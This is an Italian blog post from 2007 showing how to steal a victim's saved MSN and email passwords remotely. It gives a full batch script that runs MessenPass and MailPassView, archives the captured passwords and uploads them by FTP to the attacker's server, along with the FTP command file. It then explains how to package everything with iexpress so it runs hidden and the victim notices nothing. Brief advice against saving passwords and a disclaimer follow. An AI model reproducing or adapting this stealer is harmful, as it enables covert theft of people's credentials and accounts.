Archivio per 7 novembre 2007

Come rubare password di MSN e di una casella mail da remoto usando MessenPass e MailPassView.

Chi si ricorda dei programmini “MessePass” e “MailPassView“, quelli usati in quel famoso metodo per rubare le password via penna USB?

Bene per chi non lo sapesse questi due programmini servono per recuperare le password dimenticate memorizzate su una macchina.

Adesso vi dimostro come è possibile utilizzarli per rubare le password salvate senza avere accesso fisico alla macchina.

Il pirata informatico si serve di: uno spazio web, il programma “MessenPass”, “MailPassView”, il file eseguibile di WinRar, un editor di testo qualsiasi per scrivere il file start.bat e il file ftp.txt.

Il codice del file start.bat:

@echo off
messenpass.exe /sverhtml Password-MSN.html //scrive l'output di messenpass in un file html
mailpassview.exe /sverhtml Password-Outlock.html //scrive l'output di mailpasspreview in un file html
rar.exe a archvio.rar *.html //comprime i due file html contenenti le password in una archivio
md c:\temp //crea la cartella temporanea
copy ftp.txt C:\temp //copia il file ftp.txt nella catella temporanea
copy *.rar c:\temp //copia il file rar nella cartella temporanea
cd c:\temp //si posiziona nella cartella temporanea
ftp -v -i -s:ftp.txt //avvia la sessione ftp con lo spazio web e permette di eseguire i comandi contenuti nel file di testo
del ftp.txt //elimina il file ftp che contiene i dati di accesso e i comandi dalla cartella temporanea
del *.rar //emilina i file rar nella cartella temporanea

Il contenuto del file ftp.txt:

open tuositoftp.org //l'host dello spazio web
tuouserftp //l'username dello spazio web
tuapasswordftp //la password dello spazio web
cd msn //cartella che conterrà i log
lcd c:\temp //si posiziona nella cartella locale temporanea
BINARY //imposta il trasferimento di file di tipo binario
mput *.rar //trasferisce i file rar allo spazio web
bye
//chiude la sessione ftp

Il pirata tramite ftp crea una cartella chiamata “msn” dove riceverà il file compresso che contiene le password, successivamente invierà alla sua vittima tutti questi programmi compressi con iexpress.

Iexpress è un software di casa Microsoft, potete usarlo seguendo il procedimento: start->esegui->digitare “iexpress”(senza virgolette)->PREMERE INVIO.

Ovviamente ho scritto il codice con degli errori in modo tale da non poter essere usato con iexpress, questo evita l’uso spropositato ai lamer di turno.

Iexpress permette di autoestrarre dei file in modalità nascosta “hidden” quindi la vittima quando apre il file non si accorge di niente,nessuna finestra, nessun errore, non da segno di vita alcuna, la vittima è convinta che il file non funziona.

Il pirata non invierebbe mai i file senza averli prima compressi e nascosti, perchè il file ftp.txt contiene i dati di login al suo spazio web.

Due consigli:

non memorizzate le password sul vostro computer ma riscrivetele ogni volta;

se siete troppo pigri e non volete rinunciare alla comodità della password salvata vi consiglio di non aprire file eseguibili ricevuti via email o via Messenger che non siano di fonte certa, poichè potrebbero contenere questi file maligni! 😀

E’ tutto alla prossima! 😉

Annunci

Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter



Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.

Contatore Visite

  • 1,054,890 visite




















My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!

novembre: 2007
L M M G V S D
« Ott   Dic »
 1234
567891011
12131415161718
19202122232425
2627282930